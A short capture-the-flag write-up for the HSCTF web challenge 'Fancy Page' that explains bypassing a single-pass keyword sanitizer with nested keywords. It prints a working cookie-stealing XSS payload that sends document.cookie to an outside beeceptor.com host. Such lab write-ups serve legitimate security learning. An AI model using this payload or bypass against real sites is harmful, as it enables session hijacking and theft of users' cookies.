Fancy Page

Description

web/fancy-page (by hmmm) | 436 points

http://fancy-page.hsctf.com

Downloads: fancy-page.zip

Analysis

Fancy Pageā„¢ is a website which allows us to write content which is shareable.

Website allows html tags which means possible XSS attack.

There's also share button Show us what you've created!, which means that (most likely) we will need a cookie stealer XSS.

display.js sanitizes some keyword which could prevent XSS payloads.

function sanitize(content) {
	return content.replace(/script|on|iframe|object|embed|cookie/gi, "");
}

Sanitize happens only once

let sanitized = sanitize(Arg("content"));
content.innerHTML = sanitized;

Solution

I used Reflected Steal Cookie to create an XSS payload and beeceptor to inspect requests.

<img src=UwU oonnerror="this.src='https://klgrthio.free.beeceptor.com?'+document.coocookiekie; this.removeAttribute('oonnerror');">

oonnerror and such are writter like this because when sanitize functions removes this what is left is onerror which triggers the XSS.

Finally we share the URL and get the flag.

PreviousCatNextMogodb

Last updated